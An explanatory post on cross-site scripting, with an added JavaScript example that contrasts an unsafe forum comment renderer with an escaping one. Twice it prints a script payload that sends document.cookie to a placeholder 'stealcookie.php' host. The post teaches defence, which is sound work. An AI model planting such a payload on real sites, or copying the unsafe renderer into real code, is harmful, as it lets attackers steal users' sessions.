The odds of you getting hacked are worse than a fair coin toss.
According to Research Gate, 65% of websites are vulnerable to an easily exploitable class of vulnerability known as XSS.
What is XSS?
XSS stands for Cross Site Scripting. It is a type of web vulnerability where an attacker can trick your browser into running arbitrary code while the browser believes that code comes from the original, vulnerable website.
What's the risk?
While what I described above may not seem that bad, it can trick your browser into sending one-time ID codes known as Session ID Cookies to the attacker, allowing them to log in to your account and do whatever they want. A more basic attack may be using your computer's processing power for selfish purposes, e.g. crypto mining. XSS can also be used to redirect you to a phishing page even if you type the URL correctly, or to redirect the credentials you enter on the authentic login page to a phishing one. A more benign use of an XSS vulnerability would be to inject code that auto-upvotes your post.
How does it work?
XSS happens when a server displays user input on a webpage with no filtering. For example, imagine a forum where users can post whatever they want. These days webpages are organized in blocks. For example, everything between <h1> and </h1> is a nice, big heading. However, there is a special type of block:
<script>code goes here</script>
which tells the browser to execute the code inside it. In an ideal world, users would not be able to use these webpage blocks in their forum posts, and could only send plain text.
But we don't live in an ideal world.
A careless admin could forget that these blocks will be treated as code and fail to censor them, which means arbitrary code could be run in users' web browsers. In our previous forum example, let's say that a malicious actor posts the following comment:
<script>location.replace("https://example.com/stealcookie.php?cookie="+document.cookie)</script>
HUH?? What does all that gibberish mean? Well, let's break it down:
<script>: interpret everything from here as code until you see </script>
location.replace("url goes here"): redirects the user to the URL between the quotes
https://example.com/stealcookie.php?cookie= : the cookie stealer's URL
document.cookie: the user's preferences and, more importantly, the one-time Session ID I mentioned earlier!
</script>: the code block is finished.
The cookie stealer would log the cookie sent to it and, to be more stealthy, redirect the user back to the forum page. The result is that the user's ID has been leaked and the hacker can log in. In fact, if the user in question is the admin, the admin account gets hacked!
Is there a remedy?
Ok. So it's not as bad as it sounds, as this vulnerability is around 25 years old, and people learn. Right? Sort of. Beginners make this mistake to this day, but giants like Google are pretty much immune. Probably. You see, bare-bones protection is easy: just censor the angle brackets. But when you're as big as Google, with thousands of potentially exploitable inputs, I wouldn't be surprised if, somewhere in there, an XSS vuln still lurks...
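The forum example above, worked in added JavaScript (not code from the original post): a comment renderer that drops the attacker's comment straight into the page, beside one that escapes it first. It goes one step beyond "censor the angle brackets" by also escaping quotes and ampersands, since the same input can land inside an attribute. The stealcookie.php URL is the placeholder from the post, not a real endpoint.

```javascript
// Added example: a minimal forum comment renderer, first the vulnerable
// version (user input concatenated straight into HTML), then the fixed one
// that escapes the characters HTML treats specially.

// Constructed attacker comment, the same shape as the one shown above.
// The URL is a placeholder copied from the post, not a real cookie stealer.
const MALICIOUS_COMMENT =
  '<script>location.replace("https://example.com/stealcookie.php?cookie="+document.cookie)</script>';

// Vulnerable: the comment is inserted as-is, so the browser sees a real
// <script> block and executes it when the forum page is viewed.
function renderCommentUnsafe(comment) {
  return '<div class="comment">' + comment + '</div>';
}

// Fixed: replace every character that can start or end markup with its HTML
// entity. Escaping only < and > is not enough when the value can also end up
// inside an attribute, so quotes and & are covered as well.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderCommentSafe(comment) {
  return '<div class="comment">' + escapeHtml(comment) + '</div>';
}

// Crude check for the test below: does the rendered HTML still contain a live
// <script> tag? A browser would execute it; here we only inspect the string.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('unsafe: ' + renderCommentUnsafe(MALICIOUS_COMMENT));
console.log('safe:   ' + renderCommentSafe(MALICIOUS_COMMENT));
```

In the escaped output the comment is shown to other users as literal text that reads like code, but the browser never executes it.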